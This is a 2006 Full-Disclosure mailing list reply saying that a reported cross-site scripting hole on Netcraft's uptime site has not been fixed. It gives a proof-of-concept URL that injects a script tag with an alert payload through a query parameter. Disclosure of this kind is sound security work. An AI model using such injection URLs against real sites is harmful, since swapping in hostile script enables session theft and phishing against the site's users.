[Full-disclosure] Re: XSS at Netcraft.com
Valery Marchuk
tecklord at argocom.cv.ua
Wed Aug 2 21:23:10 BST 2006
> They seem to have fixed the particular issue as of now. Of course, it's
> rather sad that a net security company does have XSS issues, but at least
> they seem to have reacted quickly.
No they have not. XSS still exists.
http://uptime.netcraft.com//netmove/today?mode=new%5Fsite&zero=0"><script>alert('www.securitylab.ru')</script>
Just turn on JavaScript in your browser or turn off your firewall:)
Full-Disclosure is hosted and sponsored by Secunia.